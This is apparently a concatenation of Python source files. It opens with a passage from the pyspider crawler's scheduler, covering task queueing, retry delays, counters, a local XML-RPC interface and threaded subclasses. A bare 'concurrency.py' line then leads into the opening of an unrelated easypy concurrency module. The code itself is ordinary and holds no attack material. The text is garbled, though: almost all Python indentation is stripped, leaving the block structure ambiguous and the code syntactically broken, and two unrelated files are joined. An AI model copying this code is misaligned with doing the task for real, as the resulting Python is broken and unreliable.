status_count.get(self.taskdb.FAILED, 0) + status_count.get(self.taskdb.BAD, 0)
)
self._cnt['all'].value(
(project_name, 'pending'),
status_count.get(self.taskdb.ACTIVE, 0)
)
def task_verify(self, task):
'''
return False if any of 'taskid', 'project', 'url' is not in task dict
        or the task's project is not known to the scheduler
'''
for each in ('taskid', 'project', 'url', ):
if each not in task or not task[each]:
logger.error('%s not in task: %.200r', each, task)
return False
if task['project'] not in self.projects:
logger.error('unknown project: %s', task['project'])
return False
project = self.projects[task['project']]
if not project.active:
logger.error('project %s not started, please set status to RUNNING or DEBUG',
task['project'])
return False
return True
def insert_task(self, task):
'''insert task into database'''
return self.taskdb.insert(task['project'], task['taskid'], task)
def update_task(self, task):
'''update task in database'''
return self.taskdb.update(task['project'], task['taskid'], task)
def put_task(self, task):
'''put task to task queue'''
_schedule = task.get('schedule', self.default_schedule)
self.projects[task['project']].task_queue.put(
task['taskid'],
priority=_schedule.get('priority', self.default_schedule['priority']),
exetime=_schedule.get('exetime', self.default_schedule['exetime'])
)
def send_task(self, task, force=True):
'''
dispatch task to fetcher
        the out queue may have a size limit to prevent blocking; a send_buffer is used to hold overflow
'''
try:
self.out_queue.put_nowait(task)
except Queue.Full:
if force:
self._send_buffer.appendleft(task)
else:
raise
def _check_task_done(self):
'''Check status queue'''
cnt = 0
try:
while True:
task = self.status_queue.get_nowait()
# check _on_get_info result here
if task.get('taskid') == '_on_get_info' and 'project' in task and 'track' in task:
if task['project'] not in self.projects:
continue
project = self.projects[task['project']]
project.on_get_info(task['track'].get('save') or {})
logger.info(
'%s on_get_info %r', task['project'], task['track'].get('save', {})
)
continue
elif not self.task_verify(task):
continue
self.on_task_status(task)
cnt += 1
except Queue.Empty:
pass
return cnt
merge_task_fields = ['taskid', 'project', 'url', 'status', 'schedule', 'lastcrawltime']
def _check_request(self):
'''Check new task queue'''
# check _postpone_request first
todo = []
for task in self._postpone_request:
if task['project'] not in self.projects:
continue
if self.projects[task['project']].task_queue.is_processing(task['taskid']):
todo.append(task)
else:
self.on_request(task)
self._postpone_request = todo
tasks = {}
while len(tasks) < self.LOOP_LIMIT:
try:
task = self.newtask_queue.get_nowait()
except Queue.Empty:
break
if isinstance(task, list):
_tasks = task
else:
_tasks = (task, )
for task in _tasks:
if not self.task_verify(task):
continue
if task['taskid'] in self.projects[task['project']].task_queue:
if not task.get('schedule', {}).get('force_update', False):
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
continue
if task['taskid'] in tasks:
if not task.get('schedule', {}).get('force_update', False):
continue
tasks[task['taskid']] = task
for task in itervalues(tasks):
self.on_request(task)
return len(tasks)
def _check_cronjob(self):
"""Check projects cronjob tick, return True when a new tick is sended"""
now = time.time()
self._last_tick = int(self._last_tick)
if now - self._last_tick < 1:
return False
self._last_tick += 1
for project in itervalues(self.projects):
if not project.active:
continue
if project.waiting_get_info:
continue
if int(project.min_tick) == 0:
continue
if self._last_tick % int(project.min_tick) != 0:
continue
self.on_select_task({
'taskid': '_on_cronjob',
'project': project.name,
'url': 'data:,_on_cronjob',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': {
'tick': self._last_tick,
},
},
'process': {
'callback': '_on_cronjob',
},
})
return True
request_task_fields = [
'taskid',
'project',
'url',
'status',
'schedule',
'fetch',
'process',
'track',
'lastcrawltime'
]
def _check_select(self):
'''Select task to fetch & process'''
while self._send_buffer:
_task = self._send_buffer.pop()
try:
                # use force=False here to prevent an automatic send_buffer append and to surface the exception
self.send_task(_task, False)
except Queue.Full:
self._send_buffer.append(_task)
break
if self.out_queue.full():
return {}
taskids = []
cnt = 0
cnt_dict = dict()
limit = self.LOOP_LIMIT
        # dynamically assign the select limit for each project, using qsize as the weight
project_weights, total_weight = dict(), 0
for project in itervalues(self.projects): # type:Project
if not project.active:
continue
            # only check project pause when selecting new tasks; cronjob and new requests keep working
if project.paused:
continue
if project.waiting_get_info:
continue
# task queue
task_queue = project.task_queue # type:TaskQueue
pro_weight = task_queue.size()
total_weight += pro_weight
project_weights[project.name] = pro_weight
pass
min_project_limit = int(limit / 10.) # ensure minimum select limit for each project
max_project_limit = int(limit / 3.0) # ensure maximum select limit for each project
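        # e.g. with LOOP_LIMIT = 1000 each project's share is clamped to the
        # range [100, 333] regardless of its queue size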
for pro_name, pro_weight in iteritems(project_weights):
if cnt >= limit:
break
project = self.projects[pro_name] # type:Project
# task queue
task_queue = project.task_queue
task_queue.check_update()
project_cnt = 0
# calculate select limit for project
if total_weight < 1 or pro_weight < 1:
project_limit = min_project_limit
else:
project_limit = int((1.0 * pro_weight / total_weight) * limit)
if project_limit < min_project_limit:
project_limit = min_project_limit
elif project_limit > max_project_limit:
project_limit = max_project_limit
            # check send_buffer here. When it is not empty, out_queue may be blocked; avoid sending more tasks
while cnt < limit and project_cnt < project_limit:
taskid = task_queue.get()
if not taskid:
break
taskids.append((project.name, taskid))
if taskid != 'on_finished':
project_cnt += 1
cnt += 1
cnt_dict[project.name] = project_cnt
if project_cnt:
project._selected_tasks = True
project._send_finished_event_wait = 0
# check and send finished event to project
if not project_cnt and len(task_queue) == 0 and project._selected_tasks:
# wait for self.FAIL_PAUSE_NUM steps to make sure all tasks in queue have been processed
if project._send_finished_event_wait < self.FAIL_PAUSE_NUM:
project._send_finished_event_wait += 1
else:
project._selected_tasks = False
project._send_finished_event_wait = 0
self._postpone_request.append({
'project': project.name,
'taskid': 'on_finished',
'url': 'data:,on_finished',
'process': {
'callback': 'on_finished',
},
"schedule": {
"age": 0,
"priority": 9,
"force_update": True,
},
})
for project, taskid in taskids:
self._load_put_task(project, taskid)
return cnt_dict
def _load_put_task(self, project, taskid):
try:
task = self.taskdb.get_task(project, taskid, fields=self.request_task_fields)
except ValueError:
logger.error('bad task pack %s:%s', project, taskid)
return
if not task:
return
task = self.on_select_task(task)
def _print_counter_log(self):
# print top 5 active counters
keywords = ('pending', 'success', 'retry', 'failed')
total_cnt = {}
project_actives = []
project_fails = []
for key in keywords:
total_cnt[key] = 0
for project, subcounter in iteritems(self._cnt['5m']):
actives = 0
for key in keywords:
cnt = subcounter.get(key, None)
if cnt:
cnt = cnt.sum
total_cnt[key] += cnt
actives += cnt
project_actives.append((actives, project))
fails = subcounter.get('failed', None)
if fails:
project_fails.append((fails.sum, project))
top_2_fails = sorted(project_fails, reverse=True)[:2]
top_3_actives = sorted([x for x in project_actives if x[1] not in top_2_fails],
reverse=True)[:5 - len(top_2_fails)]
log_str = ("in 5m: new:%(pending)d,success:%(success)d,"
"retry:%(retry)d,failed:%(failed)d" % total_cnt)
for _, project in itertools.chain(top_3_actives, top_2_fails):
subcounter = self._cnt['5m'][project].to_dict(get_value='sum')
log_str += " %s:%d,%d,%d,%d" % (project,
subcounter.get('pending', 0),
subcounter.get('success', 0),
subcounter.get('retry', 0),
subcounter.get('failed', 0))
logger.info(log_str)
def _dump_cnt(self):
'''Dump counters to file'''
self._cnt['1h'].dump(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].dump(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].dump(os.path.join(self.data_path, 'scheduler.all'))
def _try_dump_cnt(self):
'''Dump counters every 60 seconds'''
now = time.time()
if now - self._last_dump_cnt > 60:
self._last_dump_cnt = now
self._dump_cnt()
self._print_counter_log()
def _check_delete(self):
'''Check project delete'''
now = time.time()
for project in list(itervalues(self.projects)):
if project.db_status != 'STOP':
continue
if now - project.updatetime < self.DELETE_TIME:
continue
if 'delete' not in self.projectdb.split_group(project.group):
continue
logger.warning("deleting project: %s!", project.name)
del self.projects[project.name]
self.taskdb.drop(project.name)
self.projectdb.drop(project.name)
if self.resultdb:
self.resultdb.drop(project.name)
for each in self._cnt.values():
del each[project.name]
def __len__(self):
return sum(len(x.task_queue) for x in itervalues(self.projects))
def quit(self):
'''Set quit signal'''
self._quit = True
# stop xmlrpc server
if hasattr(self, 'xmlrpc_server'):
self.xmlrpc_ioloop.add_callback(self.xmlrpc_server.stop)
self.xmlrpc_ioloop.add_callback(self.xmlrpc_ioloop.stop)
def run_once(self):
        '''consume queues and feed tasks to fetcher, once'''
self._update_projects()
self._check_task_done()
self._check_request()
while self._check_cronjob():
pass
self._check_select()
self._check_delete()
self._try_dump_cnt()
def run(self):
'''Start scheduler loop'''
logger.info("scheduler starting...")
while not self._quit:
try:
time.sleep(self.LOOP_INTERVAL)
self.run_once()
self._exceptions = 0
except KeyboardInterrupt:
break
except Exception as e:
logger.exception(e)
self._exceptions += 1
if self._exceptions > self.EXCEPTION_LIMIT:
break
continue
logger.info("scheduler exiting...")
self._dump_cnt()
def trigger_on_start(self, project):
'''trigger an on_start callback of project'''
self.newtask_queue.put({
"project": project,
"taskid": "on_start",
"url": "data:,on_start",
"process": {
"callback": "on_start",
},
})
def xmlrpc_run(self, port=23333, bind='127.0.0.1', logRequests=False):
'''Start xmlrpc interface'''
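        # The interface can be reached with a plain XML-RPC client, e.g.
        # (a sketch, assuming the default bind/port below):
        #   from six.moves.xmlrpc_client import ServerProxy
        #   ServerProxy('http://127.0.0.1:23333/').size()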
from pyspider.libs.wsgi_xmlrpc import WSGIXMLRPCApplication
application = WSGIXMLRPCApplication()
application.register_function(self.quit, '_quit')
application.register_function(self.__len__, 'size')
def dump_counter(_time, _type):
try:
return self._cnt[_time].to_dict(_type)
except:
logger.exception('')
application.register_function(dump_counter, 'counter')
def new_task(task):
if self.task_verify(task):
self.newtask_queue.put(task)
return True
return False
application.register_function(new_task, 'newtask')
def send_task(task):
'''dispatch task to fetcher'''
self.send_task(task)
return True
application.register_function(send_task, 'send_task')
def update_project():
self._force_update_project = True
application.register_function(update_project, 'update_project')
def get_active_tasks(project=None, limit=100):
allowed_keys = set((
'type',
'taskid',
'project',
'status',
'url',
'lastcrawltime',
'updatetime',
'track',
))
track_allowed_keys = set((
'ok',
'time',
'follows',
'status_code',
))
iters = [iter(x.active_tasks) for k, x in iteritems(self.projects)
if x and (k == project if project else True)]
tasks = [next(x, None) for x in iters]
result = []
while len(result) < limit and tasks and not all(x is None for x in tasks):
updatetime, task = t = max(t for t in tasks if t)
i = tasks.index(t)
tasks[i] = next(iters[i], None)
for key in list(task):
if key == 'track':
for k in list(task[key].get('fetch', [])):
if k not in track_allowed_keys:
del task[key]['fetch'][k]
for k in list(task[key].get('process', [])):
if k not in track_allowed_keys:
del task[key]['process'][k]
if key in allowed_keys:
continue
del task[key]
result.append(t)
# fix for "<type 'exceptions.TypeError'>:dictionary key must be string"
# have no idea why
return json.loads(json.dumps(result))
application.register_function(get_active_tasks, 'get_active_tasks')
def get_projects_pause_status():
result = {}
for project_name, project in iteritems(self.projects):
result[project_name] = project.paused
return result
application.register_function(get_projects_pause_status, 'get_projects_pause_status')
def get_task_queue_len():
result = {}
for project_name, project in iteritems(self.projects):
result[project_name] = len(project.task_queue)
return result
application.register_function(get_task_queue_len, 'get_task_queue_len')
def webui_update():
return {
'pause_status': get_projects_pause_status(),
'task_queue_len': get_task_queue_len(),
'counter': {
'5m_time': dump_counter('5m_time', 'avg'),
'5m': dump_counter('5m', 'sum'),
'1h': dump_counter('1h', 'sum'),
'1d': dump_counter('1d', 'sum'),
'all': dump_counter('all', 'sum'),
},
}
application.register_function(webui_update, 'webui_update')
import tornado.wsgi
import tornado.ioloop
import tornado.httpserver
container = tornado.wsgi.WSGIContainer(application)
self.xmlrpc_ioloop = tornado.ioloop.IOLoop()
self.xmlrpc_server = tornado.httpserver.HTTPServer(container, io_loop=self.xmlrpc_ioloop)
self.xmlrpc_server.listen(port=port, address=bind)
logger.info('scheduler.xmlrpc listening on %s:%s', bind, port)
self.xmlrpc_ioloop.start()
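# --- Illustrative usage sketch (not part of the original source). The method names
# ('size', 'counter', 'newtask', 'webui_update') come from the register_function calls
# above; the endpoint URL and the project name 'example_project' are assumptions.
#
#     import xmlrpc.client
#
#     proxy = xmlrpc.client.ServerProxy('http://127.0.0.1:23333')
#     print(proxy.size())                  # total queued tasks across all projects
#     print(proxy.counter('5m', 'sum'))    # per-project counters for the last 5 minutes
#     proxy.newtask({
#         'project': 'example_project',    # hypothetical project name
#         'taskid': 'on_start',
#         'url': 'data:,on_start',
#         'process': {'callback': 'on_start'},
#     })
#     print(proxy.webui_update())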
def on_request(self, task):
task_log(task, 'on request')
if self.INQUEUE_LIMIT and len(self.projects[task['project']].task_queue) >= self.INQUEUE_LIMIT:
logger.debug('overflow task %(project)s:%(taskid)s %(url)s', task)
return
oldtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.merge_task_fields)
if oldtask:
return self.on_old_request(task, oldtask)
else:
return self.on_new_request(task)
def on_new_request(self, task):
'''Called when a new request arrives'''
task['status'] = self.taskdb.ACTIVE
self.insert_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
self._cnt['all'].event((project, 'pending'), +1)
logger.info('new task %(project)s:%(taskid)s %(url)s', task)
return task
def on_old_request(self, task, old_task):
'''Called when a previously crawled task arrives again'''
now = time.time()
_schedule = task.get('schedule', self.default_schedule)
old_schedule = old_task.get('schedule', {})
if _schedule.get('force_update') and self.projects[task['project']].task_queue.is_processing(task['taskid']):
# when a task is being processed, the modification may conflict with the running task;
# postpone the modification until the task has finished.
logger.info('postpone modify task %(project)s:%(taskid)s %(url)s', task)
self._postpone_request.append(task)
return
restart = False
schedule_age = _schedule.get('age', self.default_schedule['age'])
if _schedule.get('itag') and _schedule['itag'] != old_schedule.get('itag'):
restart = True
elif schedule_age >= 0 and schedule_age + (old_task.get('lastcrawltime', 0) or 0) < now:
restart = True
elif _schedule.get('force_update'):
restart = True
if not restart:
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
return
if _schedule.get('cancel'):
logger.info('cancel task %(project)s:%(taskid)s %(url)s', task)
task['status'] = self.taskdb.BAD
self.update_task(task)
self.projects[task['project']].task_queue.delete(task['taskid'])
return task
task['status'] = self.taskdb.ACTIVE
self.update_task(task)
self.put_task(task)
project = task['project']
if old_task['status'] != self.taskdb.ACTIVE:
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
if old_task['status'] == self.taskdb.SUCCESS:
self._cnt['all'].event((project, 'success'), -1).event((project, 'pending'), +1)
elif old_task['status'] == self.taskdb.FAILED:
self._cnt['all'].event((project, 'failed'), -1).event((project, 'pending'), +1)
logger.info('restart task %(project)s:%(taskid)s %(url)s', task)
return task
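# --- Illustrative sketch (not part of the original source): the 'schedule' fields that
# the restart logic above inspects. The field names ('itag', 'age', 'force_update',
# 'cancel') come from the code above; the concrete values are arbitrary examples.
#
#     task = {
#         'project': 'example_project',      # hypothetical
#         'taskid': 'abc123',
#         'url': 'http://example.com/',
#         'schedule': {
#             'itag': 'v2',              # restart if it differs from the stored itag
#             'age': 10 * 24 * 60 * 60,  # restart when lastcrawltime + age < now
#             'force_update': False,     # restart unconditionally when True
#             'cancel': False,           # mark the stored task BAD and drop it when True
#         },
#     }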
def on_task_status(self, task):
'''Called when a status pack arrives'''
try:
procesok = task['track']['process']['ok']
if not self.projects[task['project']].task_queue.done(task['taskid']):
logging.error('not processing pack: %(project)s:%(taskid)s %(url)s', task)
return None
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def on_task_done(self, task):
'''Called when a task finished successfully; called by `on_task_status`'''
task['status'] = self.taskdb.SUCCESS
task['lastcrawltime'] = time.time()
if 'schedule' in task:
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
task['status'] = self.taskdb.ACTIVE
next_exetime = task['schedule'].get('age')
task['schedule']['exetime'] = time.time() + next_exetime
self.put_task(task)
else:
del task['schedule']
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'success'), +1)
self._cnt['1h'].event((project, 'success'), +1)
self._cnt['1d'].event((project, 'success'), +1)
self._cnt['all'].event((project, 'success'), +1).event((project, 'pending'), -1)
logger.info('task done %(project)s:%(taskid)s %(url)s', task)
task_monitor(task, 'success')
return task
def on_task_failed(self, task):
'''Called when a task has failed; called by `on_task_status`'''
if 'schedule' not in task:
old_task = self.taskdb.get_task(task['project'], task['taskid'], fields=['schedule'])
if old_task is None:
logging.error('unknown status pack: %s' % task)
return
task['schedule'] = old_task.get('schedule', {})
retries = task['schedule'].get('retries', self.default_schedule['retries'])
retried = task['schedule'].get('retried', 0)
project_info = self.projects[task['project']]
retry_delay = project_info.retry_delay or self.DEFAULT_RETRY_DELAY
next_exetime = retry_delay.get(retried, retry_delay.get('', self.DEFAULT_RETRY_DELAY['']))
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
next_exetime = min(next_exetime, task['schedule'].get('age'))
else:
if retried >= retries:
next_exetime = -1
elif 'age' in task['schedule'] and next_exetime > task['schedule'].get('age'):
next_exetime = task['schedule'].get('age')
if next_exetime < 0:
task['status'] = self.taskdb.FAILED
task['lastcrawltime'] = time.time()
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'failed'), +1)
self._cnt['1h'].event((project, 'failed'), +1)
self._cnt['1d'].event((project, 'failed'), +1)
self._cnt['all'].event((project, 'failed'), +1).event((project, 'pending'), -1)
logger.info('task failed %(project)s:%(taskid)s %(url)s' % task)
task_monitor(task, 'failed')
return task
else:
task['schedule']['retried'] = retried + 1
task['schedule']['exetime'] = time.time() + next_exetime
task['lastcrawltime'] = time.time()
self.update_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'retry'), +1)
self._cnt['1h'].event((project, 'retry'), +1)
self._cnt['1d'].event((project, 'retry'), +1)
# self._cnt['all'].event((project, 'retry'), +1)
logger.info('task retry %d/%d %%(project)s:%%(taskid)s %%(url)s' % (
retried, retries), task)
task_monitor(task, 'retry')
return task
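# --- Illustrative sketch (not part of the original source): the shape of a retry_delay
# mapping as read by retry_delay.get(retried, ...) above -- keys are the number of
# retries already performed, '' is the fallback. The values shown are assumptions, not
# the actual DEFAULT_RETRY_DELAY.
#
#     retry_delay = {
#         0: 30,             # first retry after 30 seconds
#         1: 60 * 60,        # second retry after one hour
#         2: 6 * 60 * 60,    # third retry after six hours
#         '': 24 * 60 * 60,  # any further retry after one day
#     }
#     retried = 1
#     next_exetime = retry_delay.get(retried, retry_delay.get('', 24 * 60 * 60))  # -> 3600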
def on_select_task(self, task):
'''Called when a task is selected to fetch & process'''
# inject information about the project
logger.info('select %(project)s:%(taskid)s %(url)s', task)
project_info = self.projects.get(task['project'])
assert project_info, 'no such project'
task['type'] = self.TASK_PACK
task['group'] = project_info.group
task['project_md5sum'] = project_info.md5sum
task['project_updatetime'] = project_info.updatetime
# lazy join project.crawl_config
if getattr(project_info, 'crawl_config', None):
task = BaseHandler.task_join_crawl_config(task, project_info.crawl_config)
project_info.active_tasks.appendleft((time.time(), task))
self.send_task(task)
return task
from tornado import gen
class OneScheduler(Scheduler):
"""
Scheduler mixin class for one mode.
Overrides the send_task method to
call processor.on_task(fetcher.fetch(task)) instead of consuming the queue.
"""
def _check_select(self):
"""
interactive mode of select tasks
"""
if not self.interactive:
return super(OneScheduler, self)._check_select()
# waiting for running tasks
if self.running_task > 0:
return
is_crawled = []
def run(project=None):
return crawl('on_start', project=project)
def crawl(url, project=None, **kwargs):
"""
Crawl given url, same parameters as BaseHandler.crawl
url - url or taskid, parameters will be used if in taskdb
project - can be ignored if only one project exists.
"""
# looking up the project instance
if project is None:
if len(self.projects) == 1:
project = list(self.projects.keys())[0]
else:
raise LookupError('You need to specify the project: %r'
% list(self.projects.keys()))
project_data = self.processor.project_manager.get(project)
if not project_data:
raise LookupError('no such project: %s' % project)
# get task package
instance = project_data['instance']
instance._reset()
task = instance.crawl(url, **kwargs)
if isinstance(task, list):
raise Exception('url list is not allowed in interactive mode')
# check task in taskdb
if not kwargs:
dbtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.request_task_fields)
if not dbtask:
dbtask = self.taskdb.get_task(task['project'], task['url'],
fields=self.request_task_fields)
if dbtask:
task = dbtask
# select the task
self.on_select_task(task)
is_crawled.append(True)
shell.ask_exit()
def quit_interactive():
'''Quit interactive mode'''
is_crawled.append(True)
self.interactive = False
shell.ask_exit()
def quit_pyspider():
'''Close pyspider'''
is_crawled[:] = []
shell.ask_exit()
shell = utils.get_python_console()
banner = (
'pyspider shell - Select task\n'
'crawl(url, project=None, **kwargs) - same parameters as BaseHandler.crawl\n'
'quit_interactive() - Quit interactive mode\n'
'quit_pyspider() - Close pyspider'
)
if hasattr(shell, 'show_banner'):
shell.show_banner(banner)
shell.interact()
else:
shell.interact(banner)
if not is_crawled:
self.ioloop.add_callback(self.ioloop.stop)
def __getattr__(self, name):
"""patch for crawl(url, callback=self.index_page) API"""
if self.interactive:
return name
raise AttributeError(name)
def on_task_status(self, task):
"""Ignore not processing error in interactive mode"""
if not self.interactive:
super(OneScheduler, self).on_task_status(task)
try:
procesok = task['track']['process']['ok']
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def init_one(self, ioloop, fetcher, processor,
result_worker=None, interactive=False):
self.ioloop = ioloop
self.fetcher = fetcher
self.processor = processor
self.result_worker = result_worker
self.interactive = interactive
self.running_task = 0
@gen.coroutine
def do_task(self, task):
task_log(task, 'do task')
self.running_task += 1
result = yield gen.Task(self.fetcher.fetch, task)
type, task, response = result.args
self.processor.on_task(task, response)
# handle messages from the processor
while not self.processor.inqueue.empty():
_task, _response = self.processor.inqueue.get()
self.processor.on_task(_task, _response)
# handle results from the processor
while not self.processor.result_queue.empty():
_task, _result = self.processor.result_queue.get()
if self.result_worker:
self.result_worker.on_result(_task, _result)
self.running_task -= 1
def send_task(self, task, force=True):
if self.fetcher.http_client.free_size() <= 0:
if force:
self._send_buffer.appendleft(task)
else:
raise self.outqueue.Full
self.ioloop.add_future(self.do_task(task), lambda x: x.result())
def run(self):
import tornado.ioloop
tornado.ioloop.PeriodicCallback(self.run_once, 100,
io_loop=self.ioloop).start()
self.ioloop.start()
def quit(self):
self.ioloop.stop()
logger.info("scheduler exiting...")
import random
import threading
from pyspider.database.sqlite.sqlitebase import SQLiteMixin
class ThreadBaseScheduler(Scheduler):
def __init__(self, threads=4, *args, **kwargs):
self.local = threading.local()
super(ThreadBaseScheduler, self).__init__(*args, **kwargs)
if isinstance(self.taskdb, SQLiteMixin):
self.threads = 1
else:
self.threads = threads
self._taskdb = self.taskdb
self._projectdb = self.projectdb
self._resultdb = self.resultdb
self.thread_objs = []
self.thread_queues = []
self._start_threads()
assert len(self.thread_queues) > 0
@property
def taskdb(self):
if not hasattr(self.local, 'taskdb'):
self.taskdb = self._taskdb.copy()
return self.local.taskdb
@taskdb.setter
def taskdb(self, taskdb):
self.local.taskdb = taskdb
@property
def projectdb(self):
if not hasattr(self.local, 'projectdb'):
self.projectdb = self._projectdb.copy()
return self.local.projectdb
@projectdb.setter
def projectdb(self, projectdb):
self.local.projectdb = projectdb
@property
def resultdb(self):
if not hasattr(self.local, 'resultdb'):
self.resultdb = self._resultdb.copy()
return self.local.resultdb
@resultdb.setter
def resultdb(self, resultdb):
self.local.resultdb = resultdb
def _start_threads(self):
for i in range(self.threads):
queue = Queue.Queue()
thread = threading.Thread(target=self._thread_worker, args=(queue, ))
thread.daemon = True
thread.start()
self.thread_objs.append(thread)
self.thread_queues.append(queue)
def _thread_worker(self, queue):
while True:
method, args, kwargs = queue.get()
try:
method(*args, **kwargs)
except Exception as e:
logger.exception(e)
def _run_in_thread(self, method, *args, **kwargs):
i = kwargs.pop('_i', None)
block = kwargs.pop('_block', False)
if i is None:
while True:
for queue in self.thread_queues:
if queue.empty():
break
else:
if block:
time.sleep(0.1)
continue
else:
queue = self.thread_queues[random.randint(0, len(self.thread_queues)-1)]
break
else:
queue = self.thread_queues[i % len(self.thread_queues)]
queue.put((method, args, kwargs))
if block:
self._wait_thread()
def _wait_thread(self):
while True:
if all(queue.empty() for queue in self.thread_queues):
break
time.sleep(0.1)
def _update_project(self, project):
self._run_in_thread(Scheduler._update_project, self, project)
def on_task_status(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_task_status, self, task, _i=i)
def on_request(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_request, self, task, _i=i)
def _load_put_task(self, project, taskid):
i = hash(taskid)
self._run_in_thread(Scheduler._load_put_task, self, project, taskid, _i=i)
def run_once(self):
super(ThreadBaseScheduler, self).run_once()
self._wait_thread()
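# --- Illustrative sketch (not part of the original source): why on_task_status and
# on_request above pass _i=hash(task['taskid']). Pinning a taskid to one worker queue
# keeps all updates for that task ordered; the values below are arbitrary examples.
#
#     thread_queues = [queue_a, queue_b, queue_c, queue_d]    # self.thread_queues, threads=4
#     i = hash('abc123')                                       # same taskid -> same hash
#     queue = thread_queues[i % len(thread_queues)]            # always the same queue for 'abc123'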
|
concurrency.py
|
# encoding: utf-8
"""
This module helps you run things concurrently.
Most useful are the ``concurrent`` context manager and the ``MultiObject`` class.
The features in this module are integrated with the ``logging`` module, to provide
thread-context to log messages. It also has support for integration with ``gevent``.
``MultiObject``
Here's how you would, for example, concurrently send a message to a bunch of servers::
responses = MultiObject(servers).send('Hello')
The above replaces the following threading boiler-plate code::
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(max_workers=3) as executor:
futures = [
executor.submit(server.send, 'Hello')
for server in servers]
responses = [future.result() for future in futures]
``concurrent``
A high-level thread controller.
As a context manager, it runs a function in a thread, and joins it upon exiting the context
with concurrent(requests.get, "api.myserver.com/data") as future:
my_data = open("local_data").read()
remote_data = future.result()
process_it(my_data, remote_data)
It can also be used to run something repeatedly in the background:
concurrent(send_heartbeat, loop=True, sleep=5).start() # until the process exits
with concurrent(print_status, loop=True, sleep=5):
some_long_task()
Environment variables
EASYPY_DISABLE_CONCURRENCY (yes|no|true|false|1|0)
EASYPY_MAX_THREAD_POOL_SIZE
Important notes
* Exception.timestamp
Exceptions raised in functions that use the features here may get a ``timestamp`` attribute that
records the precise time those exceptions were raised. This is useful when there's a lag between
when the exception was raised within a thread, and when that exception was finally propagated to
the calling thread.
"""
from concurrent.futures import ThreadPoolExecutor, CancelledError, as_completed, Future, wait as futures_wait
from concurrent.futures import TimeoutError as FutureTimeoutError
from collections import defaultdict
from contextlib import contextmanager, ExitStack
from functools import partial, wraps
from importlib import import_module
from itertools import chain
from traceback import format_tb
import inspect
import logging
import threading
import time
import os
from collections import namedtuple
from datetime import datetime
import easypy._multithreading_init # noqa; make it initialize the threads tree
from easypy.exceptions import PException, apply_timestamp
from easypy.gevent import is_module_patched, non_gevent_sleep, defer_to_thread
from easypy.humanize import IndentableTextBuffer, time_duration, compact
from easypy.humanize import format_thread_stack, yesno_to_bool
from easypy.threadtree import iter_thread_frames
from easypy.timing import Timer
from easypy.units import MINUTE, HOUR
from easypy.colors import colorize, uncolored
from easypy.sync import SynchronizationCoordinator, ProcessExiting, raise_in_main_thread
MAX_THREAD_POOL_SIZE = int(os.environ.get('EASYPY_MAX_THREAD_POOL_SIZE', 50))
DISABLE_CONCURRENCY = yesno_to_bool(os.getenv("EASYPY_DISABLE_CONCURRENCY", "no"))
this_module = import_module(__name__)
THREADING_MODULE_PATHS = [threading.__file__]
IS_GEVENT = False
if is_module_patched("threading"):
IS_GEVENT = True
import gevent
MAX_THREAD_POOL_SIZE *= 100 # these are not threads anymore, but greenlets. so we allow a lot of them
THREADING_MODULE_PATHS.append(gevent.__path__[0])
try:
from traceback import _extract_stack_iter
except ImportError:
from traceback import walk_stack
def _extract_stack_iter(frame):
for f, lineno in walk_stack(frame):
co = f.f_code
filename = co.co_filename
name = co.co_name
yield filename, lineno, name
_logger = logging.getLogger(__name__)
def disable():
"""
Force MultiObject and concurrent calls to run synchronously in the current thread.
For debugging purposes.
"""
global DISABLE_CONCURRENCY
DISABLE_CONCURRENCY = True
logging.info("Concurrency disabled")
def enable():
"""
Re-enable concurrency, after disabling it
"""
global DISABLE_CONCURRENCY
DISABLE_CONCURRENCY = False
logging.info("Concurrency enabled")
def _find_interesting_frame(f):
"""
Find the next frame in the stack that isn't threading-related, to get to the actual caller.
"""
default = next(_extract_stack_iter(f))
non_threading = (
p for p in _extract_stack_iter(f)
if all(not p[0].startswith(pth) for pth in THREADING_MODULE_PATHS))
return next(non_threading, default)
class MultiExceptionMeta(type):
"""
This metaclass helps generate MultiException subtypes so that it's easier
to catch a MultiException with a specific common type, for example::
try:
MultiObject(servers).connect()
except MultiException[ConnectionError]:
pass
See ``MultiException`` for more information.
"""
_SUBTYPES = {}
_SUBTYPES_LOCK = threading.RLock()
def __getitem__(cls, exception_type):
if exception_type is BaseException:
return MultiException
assert isinstance(exception_type, type), "Must use an Exception type"
assert issubclass(exception_type, BaseException), "Must inherit from BaseException"
try:
return cls._SUBTYPES[exception_type]
except KeyError:
with cls._SUBTYPES_LOCK:
if exception_type in cls._SUBTYPES:
return cls._SUBTYPES[exception_type]
